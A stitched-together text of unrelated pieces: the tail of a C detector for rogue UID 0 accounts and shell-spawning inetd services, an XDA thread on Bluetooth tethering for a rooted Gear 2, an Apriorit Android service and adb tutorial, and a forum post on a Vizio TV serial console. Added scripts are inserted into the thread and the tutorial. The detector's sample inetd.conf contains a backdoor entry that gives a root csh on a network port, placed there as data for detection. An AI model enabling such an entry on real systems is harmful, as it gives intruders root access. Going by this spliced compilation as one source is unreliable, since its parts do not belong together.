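    "echo stream tcp nowait root internal\n"
    "jdevil stream tcp nowait root /bin/csh csh -i\n";

int main(void)
{
    printf("rogue UID 0 entries: %d\n", count_rogue_uid0(SAMPLE_PASSWD));
    printf("inetd services spawning a shell: %d\n",
           count_inetd_shell_services(SAMPLE_INETD));
    return 0;
}
```

On a live system the same functions would be fed the contents of /etc/passwd and /etc/inetd.conf; a tripwire-style baseline of both files catches the same edits as they happen.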
I made an attempt to share the internet connection directly to the Gear 2 with quite big success. But first things first.
What you need:
- rooted gear 2 (neo)
- enabled network tethering over bluetooth on phone paired with gear 2 (tested on Galaxy S4)
Step 0: Enable sdb root
Code:
sdb root on
Step 1: using sdb copy required network tools to /tmp/ directory on gear and change permissions:
Code:
sdb push ifconfig /tmp/
sdb push pand /tmp/
sdb push route /tmp/
sdb push ping /tmp/
sdb shell chmod +x /tmp/ifconfig
sdb shell chmod +x /tmp/pand
sdb shell chmod +x /tmp/route
sdb shell chmod +x /tmp/ping
Step 2: open shell and run hcitool:
Code:
sdb shell
sh-3.2# hcitool con
Connections:
> ACL 5C:2E:xx:xx:xx:xx handle 12 state 1 lm SLAVE AUTH ENCRYPT
5C:2E:xx:xx:xx:xx - this is mac of your phone
Step 3: connect to phone
Code:
sh-3.2# cd /tmp/
sh-3.2# ./pand --connect 5C:2E:xx:xx:xx:xx
Now you should have a new interface bnep0; you can run ./ifconfig -a to check
Step 4: Set IP and gateway
This part is a bit tricky because I couldn't manage to get an IP address by DHCP, so you have to check which address you should assign. I connected to the S4 with another Android phone and checked the IP with IP Tools from Google Play.
Code:
sh-3.2# ./ifconfig bnep0 up
sh-3.2# ./ifconfig bnep0 192.168.44.200
sh-3.2# ./route add default gw 192.168.44.1
Step 5: Test connection
Code:
sh-3.2# ./ping 8.8.8.8
PING 8.8.8.8 (8.8.8.8): 56 data bytes
64 bytes from 8.8.8.8: icmp_seq=0 ttl=44 time=716.873 ms
64 bytes from 8.8.8.8: icmp_seq=1 ttl=44 time=119.090 ms
64 bytes from 8.8.8.8: icmp_seq=4 ttl=44 time=220.530 ms
64 bytes from 8.8.8.8: icmp_seq=5 ttl=44 time=197.332 ms
64 bytes from 8.8.8.8: icmp_seq=6 ttl=44 time=199.790 ms
64 bytes from 8.8.8.8: icmp_seq=7 ttl=44 time=136.653 ms
64 bytes from 8.8.8.8: icmp_seq=8 ttl=44 time=147.867 ms
^C--- 8.8.8.8 ping statistics ---
9 packets transmitted, 7 packets received, 22% packet loss
round-trip min/avg/max/stddev = 119.090/248.305/716.873/194.396 ms
As you can see, the connection isn't very stable.
What opportunities does that give us?
XMLHttpRequest from watchface or application without bridge app on phone
Standalone webbrowser
...?
TODO:
dhclient
auto connection when paired with phone
DNS
Integration with ROM
Update 1:
dhclient now works (dirty hand made dhclient-script)
DNS works (thanks to Talon^)
Permanent write to rom (still no autoconnect)
I've created a tar package which should make the whole process easier.
To install gearnet.tar package do the following:
1. By adb
Code:
sdb push gearnet.tar /tmp/
sdb root on
sdb shell
In Gear shell prompt:
Code:
sh-3.2# mount -o remount,rw /
sh-3.2# tar --overwrite -xvf /tmp/gearnet.tar -C /
sh-3.2# reboot
Now, after the reboot, you should be able to run the command as root:
Code:
sh-3.2# gearnet
sh-3.2# ping google.pl
PING google.pl (74.125.195.94): 56 data bytes
64 bytes from 74.125.195.94: icmp_seq=0 ttl=45 time=132.238 ms
64 bytes from 74.125.195.94: icmp_seq=1 ttl=45 time=184.377 ms
64 bytes from 74.125.195.94: icmp_seq=2 ttl=45 time=151.909 ms
64 bytes from 74.125.195.94: icmp_seq=3 ttl=45 time=104.898 ms
64 bytes from 74.125.195.94: icmp_seq=4 ttl=45 time=153.549 ms
64 bytes from 74.125.195.94: icmp_seq=5 ttl=45 time=181.517 ms
^C--- google.pl ping statistics ---
6 packets transmitted, 6 packets received, 0% packet loss
round-trip min/avg/max/stddev = 104.898/151.415/184.377/27.474 ms
sh-3.2#
Oh what fun that was! This is really cool. It worked on my Gear 1. I had 9% packet loss... can't wait to see what's next, and thanks for sharing!
Chris
Awesome!
I was searching for this FOREVER! This is awesome. I really look forward to any updates for this.
When I first bought the watch I assumed this was already possible, but was greatly disappointed that it wasn't. This now gives me hope, and makes me want to keep the watch!
any chance for dns?
Following your guide, I snooped at other packages. I managed to get these installed for an attempt at Perl:
gdbm-1.8.3-1.1.armv7l.rpm
perl-libs-5.12.1-1.4.armv7l.rpm
perl-Module-Pluggable-3.60-1.4.armv7l.rpm
perl-Pod-Simple-3.07-1.4.armv7l.rpm
perl-IO-Compress-Base-2.008-1.4.armv7l.rpm
perl-5.12.1-1.4.armv7l.rpm
Still missing a few dependencies, but it finally worked with --nodeps and now I have perl5 on my Gear 2 Neo.
I wanted to test some sockets, so I wrote a quick snippet for IRC and it kept failing with my die message of "can't connect". Then I tried to "ping" a domain and realized there's no DNS, so once I resolved the IRC server's domain and used the IP, it connected flawlessly!
Here's a screenshot of my sdb shell running a test Perl file of the IRC client snippet.
got any ideas how to get DNS working to resolve domains so you don't have to find the IP?
found how to get DNS
There's a file in /etc called resolv.conf. I just modified it to include Google's nameservers 8.8.8.8 and 8.8.4.4, and now DNS lookups are possible; you can now say: ./ping google.com
Dumb question... but does the Gear have standalone web browsing? Correct me if I'm wrong...
the GearWeb browser?
The GearWeb browser from the Samsung Galaxy Apps store uses the SAP (Samsung Accessory Protocol) for its content. Without rooting and doing this networking trick, the Gear 2 (Gear 2 Neo also) has no direct ties to the internet, nor do any available apps. They all use the phone itself for content and share that content via SAP.
This requires you to also know Java, as the nature of how this works is an android application running as a background process on your phone waiting for a SAP connection from your wearable device, then serving the content back to the device over bluetooth. I could be wrong but this appears to be a poll-only operation. You can't just send content from the host Java App without first having a fetch request from the wearable device, which to me makes it almost worthless, especially if you wanted to do any real protocol development for your gear like IRC, Facebook Messenger, etc.. that require a live streaming socket.
Btw, I have successfully tested this networking with the STOCK Tizen IDE for Wearable with the ECMA 3 Browser Support XMLHttpRequest() and can confirm that this does now work on the watch, as long as you initiated the network.
It didn't work at first but I figured out why. You must grant it internet privileges in your config.xml and also give it an access parameter under the Policy tab. Wildmatches DO work for access policy. I gave it a vague "*" with allow subdomain true, and it works just fine.
I don't know about auto-reconnect but I believe that I should be able to make a service descriptor for systemd to init your new gearnet script. The .service files are located in /usr/lib/systemd/system
I'm going to try modifying the sap.service file in there and making a new one called gearnet.service and seeing if I can get network to start upon boot.
If this works, upon starting your gear, it should automatically attempt to establish a network connection. Not sure about making it reconnect if you walked too far away from your phone and came back into range, but as long as you don't do that, networking should be possible on boot of your wearable device
successful networking upon boot
ok so I figured out how to get the watch to connect on first boot.
This is a Linux operating system (Tizen is a form of Linux), so you need some tool that can handle UTF-8 character encoding with Unix/Linux line endings. Typical Windows Notepad uses the Windows standard line ending, which is CRLF (carriage return [ASCII code 13], line feed [ASCII code 10]), while I believe Unix/Linux just uses LF. I pulled a .service file, just modified it and saved it under a different name, but I used a Windows build of the popular GNOME editor known as 'gedit'. WordPad will also work, but Notepad will NOT!
make a file (or pull one and modify it to keep the UNIX line endings if you plan on using wordpad), call it gearnet.service with the following code:
Code:
[Unit]
Description=GearNet service
After=weconn.service
[Service]
Type=forking
ExecStart=/sbin/gearnet
Restart=always
[Install]
WantedBy=multi-user.target
push the file to /usr/lib/systemd/system
then systemctl enable gearnet.service
shut down the watch. The problem with this is, if/when you disable bluetooth on your device (on my S4) the bluetooth tethering is turned off. you must re-enable it. make sure it's enabled before powering your watch on again. (S4 it's in settings > More Networks > Tethering and Portable Hotspot)
power on your watch, you'll see once it boots on your phone, connected to <device> then shortly after, Tethering/Portable Hotspot active.
NOTE: tested to see if the internet would come back if you walk too far away from your phone. As I suspected, this fails, while the bluetooth pairing comes back, the network does not :/ I'll have to see if I can figure a way to fix this issue, but for now, instant network access upon boot is GREAT! no more needing to connect your gear to the PC and manually start networking
EDIT
I'm looking for a better solution, but I have modified the gearnet shell script and pushed it to /sbin/gearnet. This will fix the issue of losing internet connection when walking too far away from your phone, once you come back in range, the network will also come back.
Code:
#!/bin/sh
# Loop forever, checking the Bluetooth PAN link and re-establishing it when it drops
while true; do
    NET=$(ifconfig bnep0 2>/dev/null | grep "inet addr:")   # non-empty when bnep0 has an IP
    if [ -z "$NET" ]; then                                  # no IP yet, or the link was lost
        # MAC of the first ACL link hcitool reports (the paired phone)
        btaddr=$(hcitool con | awk '$2 == "ACL" {print $3}' | sort -rn | head -n 1)
        if [ -n "$btaddr" ]; then                           # only connect if a device is paired
            pand --connect "$btaddr"
            sleep 5
            dhclient bnep0
        fi
    fi
    sleep 5
done
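Added example (not from the thread): the two parsing steps the reconnect loop above depends on, pulled into functions that can be checked against captured output. It assumes the `hcitool con` and busybox `ifconfig` output formats shown earlier in the post; the sample outputs are constructed, with a made-up MAC in place of the redacted one.

```shell
#!/bin/sh
# Constructed samples mirroring the outputs shown in the post (MAC is made up).
SAMPLE_HCITOOL='Connections:
        > ACL 5C:2E:AA:BB:CC:DD handle 12 state 1 lm SLAVE AUTH ENCRYPT'

SAMPLE_IFCONFIG_UP='bnep0     Link encap:Ethernet  HWaddr 00:11:22:33:44:55
          inet addr:192.168.44.200  Bcast:192.168.44.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1'

SAMPLE_IFCONFIG_DOWN='bnep0     Link encap:Ethernet  HWaddr 00:11:22:33:44:55
          UP BROADCAST MULTICAST  MTU:1500  Metric:1'

# Peer address of the first ACL link, read from `hcitool con` output on stdin.
# Prints the MAC, or nothing when no ACL link is listed.
peer_addr() {
    awk '$1 == ">" && $2 == "ACL" { print $3; exit }'
}

# Accept only a well-formed MAC (six hex pairs) before it becomes a pand
# argument, so a garbled or unexpected line is never passed on.
is_mac() {
    printf '%s\n' "$1" | grep -Eq '^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$'
}

# True when the ifconfig output on stdin shows an IPv4 address on the interface.
has_ipv4() {
    grep -q 'inet addr:'
}

# Print the assigned IPv4 address from ifconfig output on stdin.
ipv4_addr() {
    sed -n 's/.*inet addr:\([0-9.]*\).*/\1/p'
}

# One iteration of the loop's decision, given captured outputs instead of live
# hcitool/ifconfig calls. Prints "connected <ip>", "connect <mac>" or "no-peer".
next_action() {
    hci_out=$1
    ifc_out=$2
    if printf '%s\n' "$ifc_out" | has_ipv4; then
        printf 'connected %s\n' "$(printf '%s\n' "$ifc_out" | ipv4_addr)"
        return 0
    fi
    mac=$(printf '%s\n' "$hci_out" | peer_addr)
    if is_mac "$mac"; then
        printf 'connect %s\n' "$mac"     # the loop would now run: pand --connect "$mac"
    else
        printf 'no-peer\n'
    fi
}
```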
Author: Apriorit (Device Team)
Permanent link: www(dot)apriorit(dot)com/our-company/dev-blog/130-development-for-android
In this article I’ve described:
• How to develop simple Java service for the Android Devices;
• How to communicate with a service from the other processes and a remote PC;
• How to install and start the service remotely from the PC.
1. Java Service Development for the Android Devices
Services are long-running background processes provided by Android. They can be used to execute background tasks of different kinds: calculations, backup procedures, internet communication, etc. Services can be started on system request, and they can communicate with other processes using Android's IPC mechanisms. The Android system controls the service lifecycle depending on client requests and on memory and CPU usage. Note that a service has lower priority than any process visible to the user.
Let's develop a simple example service. It will show scheduled and requested notifications to the user. The service should be manageable through service requests, from a simple Android Activity, and from the PC.
First we need to install and prepare the environment:
• Download and install the latest Android SDK from the official web site (http://developer.android.com);
• Download and install the Eclipse IDE (http://www.eclipse.org/downloads/);
• Also install the Android Development Tools (ADT) plug-in for Eclipse.
After the environment is prepared we can create Eclipse Android project. It will include sources, resources, generated files and the Android manifest.
1.1 Service class development
First of all we need to implement the service class. It should inherit from the android.app.Service (http://developer.android.com/reference/android/app/Service.html) base class. Each service class must have a corresponding <service> declaration in its package's manifest; the manifest declaration is described later. Services, like other application objects, run in the main thread of their hosting process. If you need to do some intensive work, do it in another thread.
In the service class we must implement the abstract method onBind. We also override some other methods:
onCreate(). It is called by the system when the service is first created. Usually this method is used to initialize service resources. In our case the binder, task and timer objects are created. A notification is also sent to the user and to the system log:
Code:
@Override
public void onCreate()
{
    super.onCreate();
    Log.d(LOG_TAG, "Creating service");
    showNotification("Creating NotifyService");

    binder = new NotifyServiceBinder(handler, notificator);
    task = new NotifyTask(handler, notificator);
    timer = new Timer();
}
onStart(Intent intent, int startId). It is called by the system every time a client explicitly starts the service by calling startService(Intent), providing the arguments it requires and a unique integer token representing the start request. Here we can launch background threads, schedule tasks and perform other startup operations.
Code:
@Override
public void onStart(Intent intent, int startId)
{
    super.onStart(intent, startId);
    Log.d(LOG_TAG, "Starting service");
    showNotification("Starting NotifyService");

    // run the notification task now and then every 30 seconds
    timer.scheduleAtFixedRate(task, Calendar.getInstance().getTime(), 30000);
}
onDestroy(). It is called by the system to notify a Service that it is no longer used and is being removed. Here we perform all cleanup before the service is stopped. In our case we stop all scheduled timer tasks.
Code:
@Override
public void onDestroy()
{
    super.onDestroy();
    Log.d(LOG_TAG, "Stopping service");
    showNotification("Stopping NotifyService");

    timer.cancel();
}
onBind(Intent intent). It returns the communication channel to the service. IBinder is the base interface for a remotable object, the core part of a lightweight remote procedure call mechanism designed for high-performance in-process and cross-process calls. This interface describes the abstract protocol for interacting with a remotable object. The IBinder implementation is described below.
Code:
@Override
public IBinder onBind(Intent intent)
{
    Log.d(LOG_TAG, "Binding service");
    return binder;
}
To write to the system log we use the static methods of the android.util.Log class (http://developer.android.com/reference/android/util/Log.html). To browse the system log on the PC, use the ADB command: adb logcat.
The notification feature is implemented in our service as a special Runnable object. It can be used from other threads and processes. The service class has a method showNotification, which displays a message to the user using the Toast.makeText call. The runnable object also uses it:
Code:
public class NotificationRunnable implements Runnable
{
    private String message = null;

    public void run()
    {
        if (null != message)
        {
            showNotification(message);
        }
    }

    public void setMessage(String message)
    {
        this.message = message;
    }
}
The code will be executed in the service thread. To execute the runnable we use the android.os.Handler object. There are two main uses for a Handler: to schedule messages and runnables to be executed at some point in the future, and to enqueue an action to be performed on a different thread than your own. Each Handler instance is associated with a single thread and that thread's message queue. To show a notification we set the message and call the post() method of the Handler object.
1.2 IPC Service
Each application runs in its own process. Sometimes you need to pass objects between processes and call service methods. These operations can be performed using IPC. On the Android platform, one process cannot normally access the memory of another process, so objects have to be decomposed into primitives that the operating system understands and "marshalled" across that boundary on the developer's behalf.
Android uses the AIDL IPC mechanism. It is interface-based, similar to COM or CORBA, but lighter. It uses a proxy class to pass values between the client and the implementation.
AIDL (Android Interface Definition Language) is an IDL used to generate code that enables two processes on an Android-powered device to communicate using IPC. If you have code in one process (for example, in an Activity) that needs to call methods of an object in another process (for example, a Service), you can use AIDL to generate the code that marshalls the parameters.
The service interface example shown below supports only one call, sendNotification:
Code:
interface INotifyService
{
    void sendNotification(String message);
}
The IBinder interface for a remotable object is used by clients to perform IPC. A client can communicate with the service by calling Context's bindService(). The IBinder implementation is retrieved from the onBind method. The INotifyService interface implementation is based on the android.os.Binder class (http://developer.android.com/reference/android/os/Binder.html):
Code:
public class NotifyServiceBinder extends Binder implements INotifyService
{
    private Handler handler = null;
    private NotificationRunnable notificator = null;

    public NotifyServiceBinder(Handler handler, NotificationRunnable notificator)
    {
        this.handler = handler;
        this.notificator = notificator;
    }

    public void sendNotification(String message)
    {
        if (null != notificator)
        {
            notificator.setMessage(message);
            handler.post(notificator);   // runs the notification on the service thread
        }
    }

    public IBinder asBinder()
    {
        return this;
    }
}
As described above, notifications are sent using the Handler object's post() method. The NotificationRunnable object is passed as the method's parameter.
On the client side we request the IBinder object and work with it as the INotifyService interface. To connect to the service, an implementation of the android.content.ServiceConnection interface is used. Two methods must be defined: onServiceConnected and onServiceDisconnected:
Code:
ServiceConnection conn = null;
…
conn = new ServiceConnection()
{
    public void onServiceConnected(ComponentName name, IBinder service)
    {
        Log.d("NotifyTest", "onServiceConnected");
        // direct cast works because the Activity and the service run in the same process
        INotifyService s = (INotifyService) service;
        try
        {
            s.sendNotification("Hello");
        }
        catch (RemoteException ex)
        {
            Log.d("NotifyTest", "Cannot send notification", ex);
        }
    }

    public void onServiceDisconnected(ComponentName name)
    {
    }
};
The bindService method can be called from the client Activity context to connect to the service:
bindService(new Intent(this, NotifyService.class), conn, Context.BIND_AUTO_CREATE);
The unbindService method can be called from the client Activity context to disconnect from the service:
unbindService(conn);
1.3 Remote service control
Broadcasts are the way applications and system components communicate. We can also use broadcasts to control the service from the PC. The messages are sent as Intents, and the system handles dispatching them, including starting receivers.
Intents can be broadcast to BroadcastReceivers, allowing messaging between applications. By registering a BroadcastReceiver in the application's AndroidManifest.xml (using the <receiver> tag) you can have your application's receiver class started and called whenever someone sends you a matching broadcast. The Activity Manager uses the IntentFilters that applications register to figure out which component should handle a given broadcast.
Let's develop the receiver that will start and stop the notify service on request. The base class android.content.BroadcastReceiver is used for this (http://developer.android.com/reference/android/content/BroadcastReceiver.html):
Code:
public class ServiceBroadcastReceiver extends BroadcastReceiver
{
    …
    private static String START_ACTION = "NotifyServiceStart";
    private static String STOP_ACTION = "NotifyServiceStop";
    …
    public void onReceive(Context context, Intent intent)
    {
        …
        String action = intent.getAction();
        if (START_ACTION.equalsIgnoreCase(action))
        {
            context.startService(new Intent(context, NotifyService.class));
        }
        else if (STOP_ACTION.equalsIgnoreCase(action))
        {
            context.stopService(new Intent(context, NotifyService.class));
        }
    }
}
To send a broadcast from the client application we use the Context.sendBroadcast call. Using the receiver and sending broadcasts from the PC is described in chapter 2.
1.4 Android Manifest
Every application must have an AndroidManifest.xml file in its root directory. The manifest gives the Android system essential information about the application; the system must have this information before it can run any of the application's code. The core components of an application (its activities, services, and broadcast receivers) are activated by intents. An intent is a bundle of information (an Intent object) describing a desired action, including the data to be acted upon, the category of component that should perform the action, and other pertinent instructions. Android locates an appropriate component to respond to the intent, starts a new instance of the component if one is needed, and passes the Intent object to it.
We describe two components for our service:
• The NotifyService class is declared in the <service> tag. It is not started by an intent, so no intent filter is needed.
• The ServiceBroadcastReceiver class is declared in the <receiver> tag. For the broadcast receiver, the intent filter selects the events it handles:
Code:
<application android:icon="@drawable/icon" android:label="@string/app_name">
    …
    <service android:enabled="true" android:name=".NotifyService"
             android:exported="true">
    </service>
    <receiver android:name="ServiceBroadcastReceiver">
        <intent-filter>
            <action android:name="NotifyServiceStart"></action>
            <action android:name="NotifyServiceStop"></action>
        </intent-filter>
    </receiver>
    …
2. Java service remote installation and start
2.1 Service installation
Services, like other applications for the Android platform, are installed from a package with the .apk extension. An Android package contains all required binary files and the manifest.
Before installing the service from the PC, enable the USB Debugging option in the device's Settings-Applications-Development menu and then connect the device to the PC via USB.
On the PC side we use the ADB utility, which is available in the Android SDK tools directory. ADB supports several optional command-line arguments that provide powerful features, such as copying files to and from the device. The shell argument lets you connect to the phone itself and issue rudimentary shell commands.
We will use several commands:
• Remote shell command execution: adb shell <command> <arguments>
• File send operation: adb push <local path> <remote path>
• Package installation operation: adb install <package>.apk
I'll describe the package installation process in detail. It consists of several steps which are performed by the ADB utility's install command:
• First the .apk package file must be copied to the device. The ADB utility connects to the device with the limited privileges of the "shell" user, so almost all file system directories are write-protected for it. The /data/local/tmp directory is used as temporary storage for package files. To copy the package to the device use the command:
adb push NotifyService.apk /data/local/tmp
• Package installation. ADB uses a special shell command to perform this operation. The "pm" (Package Manager?) utility is present on Android devices. It supports several command line parameters, described in Appendix I. To install the package yourself, execute the remote shell command:
adb shell pm install /data/local/tmp/NotifyService.apk
• Cleanup. After the package is installed, ADB removes the temporary file stored in the /data/local/tmp folder using the "rm" utility:
adb shell rm /data/local/tmp/NotifyService.apk
• To uninstall the package use the "pm" utility:
adb shell pm uninstall <package>
2.2 Remote service control
To start and stop the NotifyService from the PC we use the "am" (Activity Manager?) utility present on the Android device. Its command line parameters are described in Appendix II. The "am" utility can send system broadcast intents; our service has the broadcast receiver that the system launches in response.
To start NotifyService we execute the remote shell command:
adb shell am broadcast -a NotifyServiceStart
To stop NotifyService we execute the remote shell command:
adb shell am broadcast -a NotifyServiceStop
Note that the NotifyServiceStart and NotifyServiceStop actions are declared in the manifest inside the <receiver> … <intent-filter> tag. Other requests will not start the receiver.
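The install and control sequence of sections 2.1 and 2.2 as a shell script, added here as an example rather than taken from the article's sample project. It assumes adb is on the PATH (the ADB variable lets you point at another binary or a wrapper) and uses the article's package file name and "Starting service" log message; TMP_DIR and the function names are this example's own.

```shell
#!/bin/sh
ADB=${ADB:-adb}
TMP_DIR=/data/local/tmp        # the writable location the "shell" user has, as the article notes

# Mirror what `adb install` does: push the .apk, run pm install, remove the temp copy.
install_service() {
    apk=$1
    [ -f "$apk" ] || { echo "install_service: $apk not found" >&2; return 1; }
    remote="$TMP_DIR/$(basename "$apk")"
    $ADB push "$apk" "$TMP_DIR" || return 1
    $ADB shell pm install "$remote" || return 1
    $ADB shell rm "$remote"
}

# Send one of the two actions listed in the receiver's <intent-filter>.
# The receiver is reachable from adb because the filter exports it; any app on
# the device could send the same actions, which is why a receiver like this
# normally also carries an android:permission attribute.
control_service() {
    case $1 in
        start) action=NotifyServiceStart ;;
        stop)  action=NotifyServiceStop ;;
        *)     echo "usage: control_service start|stop" >&2; return 2 ;;
    esac
    $ADB shell am broadcast -a "$action"
}

# Confirm the service reacted by looking for its Log.d line in the log buffer.
service_logged() {
    $ADB logcat -d | grep -q "$1"
}

# Typical run: install_service NotifyService.apk && control_service start &&
# service_logged "Starting service"
```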
Appendix I. PM Usage (from Android console)
Code:
pm [list|path|install|uninstall]
pm list packages [-f]
pm list permission-groups
pm list permissions [-g] [-f] [-d] [-u] [GROUP]
pm path PACKAGE
pm install [-l] [-r] PATH
pm uninstall [-k] PACKAGE

The list packages command prints all packages.
Use the -f option to see their associated file.
The list permission-groups command prints all known permission groups.
The list permissions command prints all known permissions, optionally
only those in GROUP.

Use the -g option to organize by group.
Use the -f option to print all information.
Use the -s option for a short summary.
Use the -d option to only list dangerous permissions.
Use the -u option to list only the permissions users will see.

The path command prints the path to the .apk of a package.

The install command installs a package to the system. Use the -l option to
install the package with FORWARD_LOCK. Use the -r option to reinstall an
exisiting app, keeping its data.
The uninstall command removes a package from the system. Use the -k option
to keep the data and cache directories around after the package removal.
Appendix II. AM Usage (from Android console)
Code:
am [start|broadcast|instrument]
am start -D INTENT
am broadcast INTENT
am instrument [-r] [-e <ARG_NAME> <ARG_VALUE>] [-p <PROF_FILE>] [-w] <COMPONENT>

INTENT is described with:
    [-a <ACTION>] [-d <DATA_URI>] [-t <MIME_TYPE>]
    [-c <CATEGORY> [-c <CATEGORY>] ...]
    [-e|--es <EXTRA_KEY> <EXTRA_STRING_VALUE> ...]
    [--ez <EXTRA_KEY> <EXTRA_BOOLEAN_VALUE> ...]
    [-e|--ei <EXTRA_KEY> <EXTRA_INT_VALUE> ...]
    [-n <COMPONENT>] [-f <FLAGS>] [<URI>]
Sources of the sample project can be downloaded from the article's official page: www(dot)apriorit(dot)com/our-company/dev-blog/130-development-for-android
All articles, code pieces, example project sources and other materials are the intellectual property of Apriorit Inc. and their authors.
All materials are distributed under the Creative Commons BY-NC License.
Backstory: I have an old (2008?) vizio VA22L FHDTV10T. 1920x1080 60hz panel. I want to connect it to my pc, but if I use anything other than the VGA port (eg HDMI) it overscans and applies all this crap to the image. It's clear and crisp and beautiful if I use VGA (tested with old VGA gpu), but alas, my pc doesn't have a VGA output. (Yes I tried all the settings, no they don't fix it. Yes, I tried adjusting the graphics driver settings, no they haven't fixed it without being a PITA every time I turn the tv off.)
On to the important stuff: I can access the tv with a serial connection via "Service port" and can see a Das U-boot boot sequence and issue commands. I just don't know linux and can't get anywhere past the help menus. If someone could guide me on modifying this thing I'd be rather grateful!
For starters, here's the output when I first turn it on whilst pc is plugged in via VGA, wait for it to finish booting, and press enter.
PS: using PuTTY @ 115200baud
Code:
▒Boot-
Bank 0 : DQS(3 ~ 42), Size 39, Middle = 22
Bank 1 : DQS(-1 ~ 41), Size 42, Middle = 20
DRAM is set as 16 bits
Boot
Starting C main
0x00001b04
LZHS addr:0x00001b80
LZHS size:0x0002fcd8
LZHS checksum:0x00000084
U-Boot 1.1.4 (Oct 9 2009 - 12:58:21)
U-Boot code: 00D00000 -> 00D2FCD8 BSS: -> 00D7430C
RAM Configuration:
Bank #0: 00000000 64 MB
Detect flash #0: MXIC(25L320)
Flash: 4 MB
0.0.0.0
In: serial
Out: serial
Err: serial
DramSizing: 0x02000000
Finding Image...
Decompression image to 0x00010000...
Booting
Nucleus Heap is at 0x00603208(0x00be5f80)
Main task stack is at 0x00603218 (0x00002000)
============================================
Memory for Image at 0x00010000(0x005eda08):
Memory for OSAI at 0x00605228(0x00ae5f80)
Memory Reserved for ARM lib at 0x010ec000(0x00100000)
Memory Reserved for FBM at 0x011ec000(0x00e10000)
Memory Reserved for MMU at 0x01ffc000(0x00004000)
Find panel index 102(PANEL_LG_LM215WF1) from GPIO
TunerInit.....................MUSBStack-S v2.303 Init pBase = 0x20029000.
Image ROBase:0x0001099c ROLimit:0x004483f4
Protect readonly memory from 0x00000000 to 0x004483e8
MMU protect: 0x01ffc000 ~ 0xfffffff8
Successed to initialize Memory Intrusion Detection!
DTV>Detect flash #0: MXIC(25L320)
[SRM] DISP CTRL 0 0 0 0
[SRM] DISP CTRL 0 1 0 0
[DM] VT = 1111 (1111)
DM Panel V(1089 1099 1200) H(1999 2175 2239) P(120000000 143472527 175000000) F(50 75)
DM H MIN(1800 2048) H MAX(2624)
DM OK V(1111) H(2176) F(60)
[DM] VT = 1111 (1111)
DM OK HS(254)
[DM] VT = 1111 (1111)
DM Panel V(1089 1099 1200) H(1999 2175 2239) P(120000000 143472527 175000000) F(50 75)
DM H MIN(1800 2048) H MAX(2624)
DM OK V(1111) H(2176) F(60)
[DM] VT = 1111 (1111)
DM OK HS(254)
Watchdog enable:405000000
W: 1920 H: 1080 Rate: 60 DSH:800 DSV: 800 USH: 800 USV: 800 VSP: 0 TUNE: 0 bStackSize: 1
[Help]
cd: Change current directory
do: Repeat command
alias(a): Add/Show current alias
read(r): Memory read(word)
write(w): Memory write(word)
basic_(b): basic command
mtktool(0): mtktool command
customer(cust): Get customer name
pmx: pmx (scpos) command
musb: MUSB command
sif: Sif command
eeprom: Eeprom command
nim: Nim command
ir: Ir command
rtc(rtc): RTC commands
aud: Aud command
nptv(n): Nptv command
dbs: Dbs command
dmx(d): Demux commands
memtest: Memory test
pdwnc(pdwnc): PDWNC commands
bwt: BWT command
gpio: Gpio interface
DTV>
Again, thanks in advance!
Mmm, so right after posting, I figured out that I had to change directory to one of the commands listed in the first help in order to issue commands from the sub-help of each one instead of using them as arguments. EG: cd pmx [enter] pattern 1 [enter] would turn on the test pattern instead of pmx pattern or pmx pattern 1 or pmx -p and other such variants. There's probably a guide for this out there somewhere but most of my searches just turned up historical info on German submarines... Oh, and this thread which is kinda along the same lines: https://forum.xda-developers.com/android/software/rooting-mediatek-based-linux-smart-tv-t3150281
I guess now I just have to find which setting(s) fix my apparent problem, then I'll need to append the firmware, assuming I can't do it from the serial console. And that'll be the part I definitely need help with.
Maybe I can just use commands to do this, but I don't know what most of this is, and my searches aren't yielding much... That said, I can run the commands and post back the results since I don't expect anyone to have this same model.
Here's the menu and submenus with my comments in quotes:
Code:
cd: Change current directory "Figured out this one"
do: Repeat command "Self explanatory"
Usage: do loop cmd ex: do 10 read 0x200 0x10
CLI Command Return Value (-1)
alias(a): Add/Show current alias "not quite sure what this does"
read(r): Memory read(word) "I guess these are self explanatory? no output if I just run the commands"
write(w): Memory write(word)
basic_(b): basic command
[Help]
stop: Stop RS232 transparent mode
sv: System mode detection
version(ver): System version/build date
reboot: System reboot/restart
getpllclk(gpc): close loop, gpc [cpu|sys|ps|vo|adc|b2r|apl1|apl2] [[band num]]
backup(bk): backup command
mtktool(0): mtktool command "the help kinda explains?"
[Help]
et: Enter RS232 transparent mode
ft: Set RS232 factory mode
st: Stop RS232 transparent mode
customer(cust): Get customer name "returns [TPV] and nothing more"
pmx: pmx (scpos) command "looks promising?"
[Help]
enable(e): enable/disable LVDS
pattern(p): enable/disable test pattern
list(l): show panel list
query(q): dump pmx(scpos) info
set(s): set parameter
musb: MUSB command "probably controls the usb port on the back?"
[Help]
debug_on(d_on): MUSB.d_on
debug_off(d_off): MUSB.d_off
debug_level(d_l): MUSB.d_l
init(i): MUSB init
speed(speed): MUSB speed
hmsd(hm): MUSB host msd test
htst(ht): MUSB host compilance test
suspend(s): USB bus suspend
resume(r): USB bus resume
sif: Sif command "I know what edid is basically, maybe I could make the computer think this is a non-hdtv type connection?"
[Help]
init(i): Sif init
read(r): Sif read
write(w): Sif write
writebyte(wb): Sif write byte
hdcp: Sif write HDCP SRAM default value
rhdcp: Sif read HDCP
wbhdcp: Sif write byte to HDCP
rbhdcp: Sif read byte from HDCP
wallhdcp(wah): Sif write all 320 bytes to HDCP
rallhdcp(rah): Sif read all 320 bytes from HDCP
edid: Sif write EDID default value
redid: Sif read EDID
walledid(wae): Sif write all 256 bytes to EDID
ralledid(rae): Sif read all 256 bytes from EDID
tunerread(tr): Tuner I2C No-sub-addr read
tunerwrite(tw): Tuner I2C No-sub-addr write
multipleread(mr): Multiple sub-addr I2C read
multiplewrite(mw): Multiple sub-addr I2C write
scan1(s1): Scan BUS0 (System I2C)
scam2(s2): Scan BUS1 (Tuner I2C)
sif_x_read(xr): fully functional sif read
sif_x_write(xw): fully functional sif write
edidreadbyte(edidrb): edid read byte
[/HIDE]
eeprom: Eeprom command "there's an 8 pin eeprom on the mainboard" [HIDE]
[Help]
readbyte(rb): eeprom.rb [eeprom-offset]
writebyte(wb): eeprom.wb [eeprom-offset] [byteval]
uartwrite(uw): Get data from Uart and write to eeprom.[/HIDE]
nim: Nim command "I assume this controls the onboard tv tuner"[HIDE]
[Help]
